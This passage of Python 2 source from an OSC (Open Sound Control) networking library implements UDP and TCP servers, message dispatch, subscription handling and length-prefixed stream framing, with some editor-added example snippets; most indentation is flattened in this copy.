- data (list): The message arguments
"""
if len(tags) != len(data):
raise OSCServerError("Malformed OSC-message; got %d typetags [%s] vs. %d values" % (len(tags), tags, len(data)))
expr = getRegEx(pattern)
replies = []
matched = 0
for addr in self.callbacks.keys():
match = expr.match(addr)
if match and (match.end() == len(addr)):
reply = self.callbacks[addr](pattern, tags, data, client_address)
matched += 1
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
					raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.callbacks[addr], type(reply)))
if matched == 0:
if 'default' in self.callbacks:
reply = self.callbacks['default'](pattern, tags, data, client_address)
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
					raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.callbacks['default'], type(reply)))
else:
raise NoCallbackError(pattern)
return replies
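# Illustrative sketch, not part of the original module: registering a callback with an
# OSCAddressSpace and dispatching a decoded message against it, as the request handlers
# below do. The names '_example_dispatch' and 'freq_handler' are additions for demonstration.
def _example_dispatch():
	def freq_handler(pattern, tags, data, client_address):
		return None        # a handler may also return an OSCMessage, which becomes a reply
	space = OSCAddressSpace()
	space.addMsgHandler("/synth/freq", freq_handler)
	# arguments: address pattern, typetags (without the ','), argument list, originating (host, port)
	return space.dispatchMessage("/synth/freq", "f", [440.0], ('127.0.0.1', 9000))   # -> [] (no replies)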
######
#
# OSCRequestHandler classes
#
######
class OSCRequestHandler(DatagramRequestHandler):
"""RequestHandler class for the OSCServer
"""
def setup(self):
"""Prepare RequestHandler.
Unpacks request as (packet, source socket address)
Creates an empty list for replies.
"""
(self.packet, self.socket) = self.request
self.replies = []
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def handle(self):
"""Handle incoming OSCMessage
"""
decoded = decodeOSC(self.packet)
if not len(decoded):
return
self._unbundle(decoded)
def finish(self):
"""Finish handling OSCMessage.
Send any reply returned by the callback(s) back to the originating client
as an OSCMessage or OSCBundle
"""
if self.server.return_port:
self.client_address = (self.client_address[0], self.server.return_port)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
return
self.server.client.sendto(msg, self.client_address)
class ThreadingOSCRequestHandler(OSCRequestHandler):
"""Multi-threaded OSCRequestHandler;
Starts a new RequestHandler thread for each unbundled OSCMessage
"""
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function
This version starts a new thread for each sub-Bundle found in the Bundle,
then waits for all its children to finish.
"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
now = time.time()
children = []
for msg in decoded[2:]:
t = threading.Thread(target = self._unbundle, args = (msg,))
t.start()
children.append(t)
# wait for all children to terminate
for t in children:
t.join()
######
#
# OSCServer classes
#
######
class OSCServer(UDPServer, OSCAddressSpace):
"""A Synchronous OSCServer
Serves one request at-a-time, until the OSCServer is closed.
	The OSC address-pattern is matched against a set of OSC-addresses
	that have been registered to the server with a callback-function.
	If the address-pattern of the message matches the registered address of a callback,
that function is called.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = OSCRequestHandler
# define a socket timeout, so the serve_forever loop can actually exit.
socket_timeout = 1
# DEBUG: print error-tracebacks (to stderr)?
print_tracebacks = False
def __init__(self, server_address, client=None, return_port=0):
"""Instantiate an OSCServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens on
- client (OSCClient instance): The OSCClient used to send replies from this server.
If none is supplied (default) an OSCClient will be created.
- return_port (int): if supplied, sets the default UDP destination-port
for replies coming from this server.
"""
UDPServer.__init__(self, server_address, self.RequestHandlerClass)
OSCAddressSpace.__init__(self)
self.setReturnPort(return_port)
self.error_prefix = ""
self.info_prefix = "/info"
self.socket.settimeout(self.socket_timeout)
self.running = False
self.client = None
if client == None:
self.client = OSCClient(server=self)
else:
self.setClient(client)
def setClient(self, client):
"""Associate this Server with a new local Client instance, closing the Client this Server is currently using.
"""
if not isinstance(client, OSCClient):
raise ValueError("'client' argument is not a valid OSCClient object")
if client.server != None:
raise OSCServerError("Provided OSCClient already has an OSCServer-instance: %s" % str(client.server))
# Server socket is already listening at this point, so we can't use the client's socket.
# we'll have to force our socket on the client...
client_address = client.address() # client may be already connected
client.close() # shut-down that socket
# force our socket upon the client
client.setServer(self)
if client_address:
client.connect(client_address)
if not self.return_port:
self.return_port = client_address[1]
def serve_forever(self):
"""Handle one request at a time until server is closed."""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def close(self):
"""Stops serving requests, closes server (socket), closes used client
"""
self.running = False
self.client.close()
self.server_close()
def __str__(self):
"""Returns a string containing this Server's Class-name, software-version and local bound address (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " listening on osc://%s" % getUrlStr(addr)
else:
out += " (unbound)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
		return (self.socket._sock == other.socket._sock)
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the local address this server is bound to,
or None if not bound to any address.
"""
try:
return self.socket.getsockname()
except socket.error:
return None
def setReturnPort(self, port):
"""Set the destination UDP-port for replies returning from this server to the remote client
"""
if (port > 1024) and (port < 65536):
self.return_port = port
else:
self.return_port = None
def setSrvInfoPrefix(self, pattern):
"""Set the first part of OSC-address (pattern) this server will use to reply to server-info requests.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.info_prefix = pattern
def setSrvErrorPrefix(self, pattern=""):
"""Set the OSC-address (pattern) this server will use to report errors occuring during
received message handling to the remote client.
If pattern is empty (default), server-errors are not reported back to the client.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.error_prefix = pattern
def addDefaultHandlers(self, prefix="", info_prefix="/info", error_prefix="/error"):
"""Register a default set of OSC-address handlers with this Server:
- 'default' -> noCallback_handler
		the given prefix is prepended to all other callbacks registered by this method:
		- '<prefix><info_prefix>' -> serverInfo_handler
		- '<prefix><error_prefix>' -> msgPrinter_handler
- '<prefix>/print' -> msgPrinter_handler
and, if the used Client supports it;
- '<prefix>/subscribe' -> subscription_handler
- '<prefix>/unsubscribe' -> subscription_handler
Note: the given 'error_prefix' argument is also set as default 'error_prefix' for error-messages
*sent from* this server. This is ok, because error-messages generally do not elicit a reply from the receiver.
To do this with the serverInfo-prefixes would be a bad idea, because if a request received on '/info' (for example)
would send replies to '/info', this could potentially cause a never-ending loop of messages!
Do *not* set the 'info_prefix' here (for incoming serverinfo requests) to the same value as given to
the setSrvInfoPrefix() method (for *replies* to incoming serverinfo requests).
For example, use '/info' for incoming requests, and '/inforeply' or '/serverinfo' or even just '/print' as the
info-reply prefix.
"""
self.error_prefix = error_prefix
self.addMsgHandler('default', self.noCallback_handler)
self.addMsgHandler(prefix + info_prefix, self.serverInfo_handler)
self.addMsgHandler(prefix + error_prefix, self.msgPrinter_handler)
self.addMsgHandler(prefix + '/print', self.msgPrinter_handler)
if isinstance(self.client, OSCMultiClient):
self.addMsgHandler(prefix + '/subscribe', self.subscription_handler)
self.addMsgHandler(prefix + '/unsubscribe', self.subscription_handler)
def printErr(self, txt):
"""Writes 'OSCServer: txt' to sys.stderr
"""
sys.stderr.write("OSCServer: %s\n" % txt)
	def sendOSCerror(self, txt, client_address):
		"""Sends 'txt', encapsulated in an OSCMessage to the default 'error_prefix' OSC-address.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.error_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.error_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
def reportErr(self, txt, client_address):
"""Writes 'OSCServer: txt' to sys.stderr
If self.error_prefix is defined, sends 'txt' as an OSC error-message to the client(s)
(see printErr() and sendOSCerror())
"""
self.printErr(txt)
if len(self.error_prefix):
self.sendOSCerror(txt, client_address)
	def sendOSCinfo(self, txt, client_address):
		"""Sends 'txt', encapsulated in an OSCMessage to the default 'info_prefix' OSC-address.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.info_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.info_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
###
# Message-Handler callback functions
###
def handle_error(self, request, client_address):
"""Handle an exception in the Server's callbacks gracefully.
Writes the error to sys.stderr and, if the error_prefix (see setSrvErrorPrefix()) is set,
sends the error-message as reply to the client
"""
(e_type, e) = sys.exc_info()[:2]
self.printErr("%s on request from %s: %s" % (e_type.__name__, getUrlStr(client_address), str(e)))
if self.print_tracebacks:
import traceback
traceback.print_exc() # XXX But this goes to stderr!
if len(self.error_prefix):
self.sendOSCerror("%s: %s" % (e_type.__name__, str(e)), client_address)
def noCallback_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
		All registered handlers must accept these four arguments:
		- addr (string): The OSC-address pattern of the received Message
		(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints a "No callback registered to handle ..." message.
Returns None
"""
self.reportErr("No callback registered to handle OSC-address '%s'" % addr, client_address)
def msgPrinter_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
		All registered handlers must accept these four arguments:
		- addr (string): The OSC-address pattern of the received Message
		(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints the received message.
Returns None
"""
txt = "OSCMessage '%s' from %s: " % (addr, getUrlStr(client_address))
txt += str(data)
		self.printErr(txt)
def serverInfo_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
		All registered handlers must accept these four arguments:
		- addr (string): The OSC-address pattern of the received Message
		(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler returns a reply to the client, which can contain various bits of information
about this server, depending on the first argument of the received OSC-message:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'address <string>' messages, listing the server's
OSC address-space.
- 'clients' | 'targets' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
"""
if len(data) == 0:
return None
cmd = data.pop(0)
reply = None
if cmd in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('info_command', "ls | list : list OSC address-space"))
reply.append(('info_command', "clients | targets : list subscribed clients"))
elif cmd in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for addr in self.callbacks.keys():
reply.append(('address', addr))
elif cmd in ('clients', 'targets'):
if hasattr(self.client, 'getOSCTargetStrings'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
else:
cli_addr = self.client.address()
if cli_addr:
reply = OSCMessage(self.info_prefix)
reply.append(('target', "osc://%s/" % getUrlStr(cli_addr)))
else:
self.reportErr("unrecognized command '%s' in /info request from osc://%s. Try 'help'" % (cmd, getUrlStr(client_address)), client_address)
return reply
	def _subscribe(self, data, client_address):
		"""Handle the actual subscription. The provided 'data' is concatenated together to form a
		'<host>:<port>[<prefix>] [<filter>] [...]' string, which is then passed to
		parseUrlStr() & parseFilterStr() to actually retrieve <host>, <port>, etc.
This 'long way 'round' approach (almost) guarantees that the subscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (type(item) == types.IntType) and not have_port:
url += ":%d" % item
have_port = True
elif type(item) in types.StringTypes:
url += item
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
if addr != None:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
port = client_address[1]
addr = (host, port)
else:
addr = client_address
self.client._setTarget(addr, prefix, filters)
trg = self.client.getOSCTargetStr(addr)
if trg[0] != None:
reply = OSCMessage(self.info_prefix)
reply.append(('target',) + trg)
return reply
	def _unsubscribe(self, data, client_address):
		"""Handle the actual unsubscription. The provided 'data' is concatenated together to form a
		'<host>:<port>[<prefix>]' string, which is then passed to
		parseUrlStr() to actually retrieve <host>, <port> & <prefix>.
This 'long way 'round' approach (almost) guarantees that the unsubscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (type(item) == types.IntType) and not have_port:
url += ":%d" % item
have_port = True
elif type(item) in types.StringTypes:
url += item
(addr, _) = parseUrlStr(url)
if addr == None:
addr = client_address
else:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
try:
(host, port) = self.client._searchHostAddr(host)
except NotSubscribedError:
port = client_address[1]
addr = (host, port)
try:
self.client._delTarget(addr)
except NotSubscribedError, e:
txt = "%s: %s" % (e.__class__.__name__, str(e))
self.printErr(txt)
reply = OSCMessage(self.error_prefix)
reply.append(txt)
return reply
def subscription_handler(self, addr, tags, data, client_address):
"""Handle 'subscribe' / 'unsubscribe' requests from remote hosts,
if the local Client supports this (i.e. OSCMultiClient).
Supported commands:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
- '[subscribe | listen | sendto | target] <url> [<filter> ...] : Subscribe remote client/server at <url>,
and/or set message-filters for messages being sent to the subscribed host, with the optional <filter>
arguments. Filters are given as OSC-addresses (or '*') prefixed by a '+' (send matching messages) or
a '-' (don't send matching messages). The wildcard '*', '+*' or '+/*' means 'send all' / 'filter none',
and '-*' or '-/*' means 'send none' / 'filter all' (which is not the same as unsubscribing!)
Reply is an OSCMessage with the (new) subscription; 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
- '[unsubscribe | silence | nosend | deltarget] <url> : Unsubscribe remote client/server at <url>
If the given <url> isn't subscribed, a NotSubscribedError-message is printed (and possibly sent)
The <url> given to the subscribe/unsubscribe handler should be of the form:
'[osc://][<host>][:<port>][<prefix>]', where any or all components can be omitted.
If <host> is not specified, the IP-address of the message's source is used.
If <port> is not specified, the <host> is first looked up in the list of subscribed hosts, and if found,
the associated port is used.
If <port> is not specified and <host> is not yet subscribed, the message's source-port is used.
If <prefix> is specified on subscription, <prefix> is prepended to the OSC-address of all messages
sent to the subscribed host.
If <prefix> is specified on unsubscription, the subscribed host is only unsubscribed if the host,
port and prefix all match the subscription.
If <prefix> is not specified on unsubscription, the subscribed host is unsubscribed if the host and port
match the subscription.
"""
if not isinstance(self.client, OSCMultiClient):
raise OSCServerError("Local %s does not support subsctiptions or message-filtering" % self.client.__class__.__name__)
addr_cmd = addr.split('/')[-1]
if len(data):
if data[0] in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('subscribe_command', "ls | list : list subscribed targets"))
reply.append(('subscribe_command', "[subscribe | listen | sendto | target] <url> [<filter> ...] : subscribe to messages, set filters"))
reply.append(('subscribe_command', "[unsubscribe | silence | nosend | deltarget] <url> : unsubscribe from messages"))
return reply
if data[0] in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
return reply
if data[0] in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data[1:], client_address)
if data[0] in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data[1:], client_address)
if addr_cmd in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data, client_address)
if addr_cmd in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data, client_address)
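# ----------------------------------------------------------------------------
# Editor's note -- illustrative sketch, not part of the original module.
# The subscription_handler() docstring above describes the URL and filter
# syntax accepted in subscribe requests. The snippet below shows how a remote
# client *might* issue such a request, assuming the handler was registered at
# the OSC address '/subscribe' (the actual address depends on the server's
# address-space setup); host and port numbers are arbitrary examples.
def _example_subscribe_request(server_host='127.0.0.1', server_port=9000):
    """Illustrative only: ask an OSCMultiClient-equipped OSCServer to start
    sending its outgoing messages to osc://127.0.0.1:9001/monitor, limited to
    addresses under /status."""
    client = OSCClient()
    client.connect((server_host, server_port))
    msg = OSCMessage("/subscribe")              # assumed handler address
    msg.append("osc://127.0.0.1:9001/monitor")  # <host>:<port>[<prefix>]
    msg.append("+/status/*")                    # optional '+' / '-' filters
    client.send(msg)
    client.close()
# ----------------------------------------------------------------------------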
class ForkingOSCServer(ForkingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server forks a new process to handle each incoming request.
"""
# use the ThreadingOSCRequestHandler so timetagged bundles are dispatched in worker threads
RequestHandlerClass = ThreadingOSCRequestHandler
class ThreadingOSCServer(ThreadingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server starts a new thread to handle each incoming request.
"""
# use the ThreadingOSCRequestHandler so timetagged bundles are dispatched in worker threads
RequestHandlerClass = ThreadingOSCRequestHandler
######
#
# OSCError classes
#
######
class OSCError(Exception):
"""Base Class for all OSC-related errors
"""
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class OSCClientError(OSCError):
"""Class for all OSCClient errors
"""
pass
class OSCServerError(OSCError):
"""Class for all OSCServer errors
"""
pass
class NoCallbackError(OSCServerError):
"""This error is raised (by an OSCServer) when an OSCMessage with an 'unmatched' address-pattern
is received, and no 'default' handler is registered.
"""
def __init__(self, pattern):
"""The specified 'pattern' should be the OSC-address of the 'unmatched' message causing the error to be raised.
"""
self.message = "No callback registered to handle OSC-address '%s'" % pattern
class NotSubscribedError(OSCClientError):
"""This error is raised (by an OSCMultiClient) when an attempt is made to unsubscribe a host
that isn't subscribed.
"""
def __init__(self, addr, prefix=None):
if prefix:
url = getUrlStr(addr, prefix)
else:
url = getUrlStr(addr, '')
self.message = "Target osc://%s is not subscribed" % url
######
#
# OSC over streaming transport layers (usually TCP)
#
# Note from the OSC 1.0 specifications about streaming protocols:
#
# The underlying network that delivers an OSC packet is responsible for
# delivering both the contents and the size to the OSC application. An OSC
# packet can be naturally represented by a datagram by a network protocol such
# as UDP. In a stream-based protocol such as TCP, the stream should begin with
# an int32 giving the size of the first packet, followed by the contents of the
# first packet, followed by the size of the second packet, etc.
#
# The contents of an OSC packet must be either an OSC Message or an OSC Bundle.
# The first byte of the packet's contents unambiguously distinguishes between
# these two alternatives.
#
######
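# ----------------------------------------------------------------------------
# Editor's note -- illustrative sketch, not part of the original module.
# The spec note above describes the stream framing that _transmitMsg() and
# _receiveMsg() implement further below: every OSC packet is preceded by its
# size as a big-endian int32. A minimal stand-alone sketch of that framing
# (function names are hypothetical; 'struct' is already imported by this
# module):
def _example_frame_packet(packet_bytes):
    """Prefix an encoded OSC packet with its 4-byte big-endian length."""
    return struct.pack(">L", len(packet_bytes)) + packet_bytes

def _example_unframe_packet(stream_bytes):
    """Split one length-prefixed packet off the front of a byte buffer.
    Returns (packet, remainder), or (None, stream_bytes) if incomplete."""
    if len(stream_bytes) < 4:
        return None, stream_bytes
    (size,) = struct.unpack(">L", stream_bytes[:4])
    if len(stream_bytes) < 4 + size:
        return None, stream_bytes
    return stream_bytes[4:4 + size], stream_bytes[4 + size:]
# ----------------------------------------------------------------------------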
class OSCStreamRequestHandler(StreamRequestHandler, OSCAddressSpace):
""" This is the central class of a streaming OSC server. If a client
connects to the server, the server instantiates a OSCStreamRequestHandler
for each new connection. This is fundamentally different to a packet
oriented server which has a single address space for all connections.
This connection based (streaming) OSC server maintains an address space
for each single connection, because usually tcp server spawn a new thread
or process for each new connection. This would generate severe
multithreading synchronization problems when each thread would operate on
the same address space object. Therefore: To implement a streaming/TCP OSC
server a custom handler must be implemented which implements the
setupAddressSpace member in which it creates its own address space for this
very connection. This has been done within the testbench and can serve as
inspiration.
"""
def __init__(self, request, client_address, server):
""" Initialize all base classes. The address space must be initialized
before the stream request handler because the initialization function
of the stream request handler calls the setup member which again
requires an already initialized address space.
"""
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
StreamRequestHandler.__init__(self, request, client_address, server)
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def setup(self):
StreamRequestHandler.setup(self)
print "SERVER: New client connection."
self.setupAddressSpace()
self.server._clientRegister(self)
def setupAddressSpace(self):
""" Override this function to customize your address space. """
pass
def finish(self):
StreamRequestHandler.finish(self)
self.server._clientUnregister(self)
print "SERVER: Client connection handled."
def _transmit(self, data):
sent = 0
while sent < len(data):
tmp = self.connection.send(data[sent:])
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsg(self, msg):
"""Send an OSC message over a streaming socket. Raises exception if it
should fail. If everything is transmitted properly, True is returned. If
socket has been closed, False.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
try:
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = array.array('c', '\0' * 4)
struct.pack_into(">L", len_big_endian, 0, length)
len_big_endian = len_big_endian.tostring()
if self._transmit(len_big_endian) and self._transmit(binary):
return True
return False
except socket.error, e:
if e[0] == errno.EPIPE: # broken pipe
return False
raise e
def _receive(self, count):
""" Receive a certain amount of data from the socket and return it. If the
remote end should be closed in the meanwhile None is returned.
"""
chunk = self.connection.recv(count)
if not chunk or len(chunk) == 0:
return None
while len(chunk) < count:
tmp = self.connection.recv(count - len(chunk))
if not tmp or len(tmp) == 0:
return None
chunk = chunk + tmp
return chunk
def _receiveMsg(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get the OSC packet size from the stream; it is prepended to each transmission
chunk = self._receive(4)
if chunk == None:
print "SERVER: Socket has been closed."
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receive(slen)
if chunk == None:
print "SERVER: Socket has been closed."
return None
# decode OSC data and dispatch
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("SERVER: Message decoding failed.")
return msg
def handle(self):
"""
Handle a connection.
"""
# make the socket blocking to avoid "resource currently not available"
# exceptions: the connection socket inherits its settings from the
# listening socket, which uses a timeout to provide a way to shut the
# server down. Here, however, we want clean, blocking behaviour.
self.connection.settimeout(None)
print "SERVER: Entered server loop"
try:
while True:
decoded = self._receiveMsg()
if decoded == None:
return
elif len(decoded) <= 0:
# if message decoding fails we try to stay in sync but print a message
print "OSC stream server: Spurious message received."
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
# no replies, continue receiving
continue
self._txMutex.acquire()
txOk = self._transmitMsg(msg)
self._txMutex.release()
if not txOk:
break
except socket.error, e:
if e[0] == errno.ECONNRESET:
# if connection has been reset by client, we do not care much
# about it, we just assume our duty fulfilled
print "SERVER: Connection has been reset by peer."
else:
raise e
def sendOSC(self, oscData):
""" This member can be used to transmit OSC messages or OSC bundles
over the client/server connection. It is thread-safe.
"""
self._txMutex.acquire()
result = self._transmitMsg(oscData)
self._txMutex.release()
return result
""" TODO Note on threaded unbundling for streaming (connection oriented)
transport:
Threaded unbundling as implemented in ThreadingOSCServer must be implemented in
a different way for the streaming variant, because contrary to the datagram
version the streaming handler is instantiated only once per connection. This
leads to the problem (if threaded unbundling is implemented as in OSCServer)
that all further message reception is blocked until all (previously received)
pending messages are processed.
Each StreamRequestHandler should provide a so called processing queue in which
all pending messages or subbundles are inserted to be processed in the future).
When a subbundle or message gets queued, a mechanism must be provided that
those messages get invoked when time asks for them. There are the following
opportunities:
- a timer is started which checks at regular intervals for messages in the
queue (polling - requires CPU resources)
- a dedicated timer is started for each message (requires timer resources)
"""
class OSCStreamingServer(TCPServer):
""" A connection oriented (TCP/IP) OSC server.
"""
# define a socket timeout, so the serve_forever loop can actually exit.
# with 2.6 and server.shutdown this wouldn't be necessary
socket_timeout = 1
# this is the class which handles a new connection. Override this for a
# useful customized server. See the testbench for an example
RequestHandlerClass = OSCStreamRequestHandler
def __init__(self, address):
"""Instantiate an OSCStreamingServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens for new connections.
"""
self._clientList = []
self._clientListMutex = threading.Lock()
TCPServer.__init__(self, address, self.RequestHandlerClass)
self.socket.settimeout(self.socket_timeout)
def serve_forever(self):
"""Handle one request at a time until server is closed.
Had to add this since 2.5 does not support server.shutdown()
"""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def start(self):
""" Start the server thread. """
self._server_thread = threading.Thread(target=self.serve_forever)
self._server_thread.setDaemon(True)
self._server_thread.start()
def stop(self):
""" Stop the server thread and close the socket. """
self.running = False
self._server_thread.join()
self.server_close()
# 2.6 only
#self.shutdown()
def _clientRegister(self, client):
""" Gets called by each request/connection handler when connection is
established to add itself to the client list
"""
self._clientListMutex.acquire()
self._clientList.append(client)
self._clientListMutex.release()
def _clientUnregister(self, client):
""" Gets called by each request/connection handler when connection is
lost to remove itself from the client list
"""
self._clientListMutex.acquire()
self._clientList.remove(client)
self._clientListMutex.release()
def broadcastToClients(self, oscData):
""" Send OSC message or bundle to all connected clients. """
result = True
for client in self._clientList:
result = result and client.sendOSC(oscData)
return result
class OSCStreamingServerThreading(ThreadingMixIn, OSCStreamingServer):
""" Implements a server which spawns a separate thread for each incoming
connection. Care must be taken, since the OSC address space is the same for
all connections.
"""
pass
class OSCStreamingClient(OSCAddressSpace):
""" OSC streaming client.
A streaming client establishes a connection to a streaming server but must
be able to handle replies by the server as well. To accomplish this the
receiving takes place in a secondary thread, because no one knows if we
have to expect a reply or not, i.e. synchronous architecture doesn't make
much sense.
Replies will be matched against the local address space. If message
handlers access code of the main thread (where the client messages are sent
to the server) care must be taken e.g. by installing sychronization
mechanisms or by using an event dispatcher which can handle events
originating from other threads.
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
rcvbuf_size = 4096 * 8
def __init__(self):
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.rcvbuf_size)
self.socket.settimeout(1.0)
self._running = False
def _receiveWithTimeout(self, count):
chunk = str()
while len(chunk) < count:
try:
tmp = self.socket.recv(count - len(chunk))
except socket.timeout:
if not self._running:
print "CLIENT: Socket timed out and termination requested."
return None
else:
continue
except socket.error, e:
if e[0] == errno.ECONNRESET:
print "CLIENT: Connection reset by peer."
return None
else:
raise e
if not tmp or len(tmp) == 0:
print "CLIENT: Socket has been closed."
return None
chunk = chunk + tmp
return chunk
def _receiveMsgWithTimeout(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get the OSC packet size from the stream; it is prepended to each transmission
chunk = self._receiveWithTimeout(4)
if not chunk:
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receiveWithTimeout(slen)
if not chunk:
return None
# decode OSC content
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("CLIENT: Message decoding failed.")
return msg
def _receiving_thread_entry(self):
print "CLIENT: Entered receiving thread."
self._running = True
while self._running:
decoded = self._receiveMsgWithTimeout()
if not decoded:
break
elif len(decoded) <= 0:
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
continue
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
if not txOk:
break
print "CLIENT: Receiving thread terminated."
def _unbundle(self, decoded):
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.socket.getpeername())
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def connect(self, address):
self.socket.connect(address)
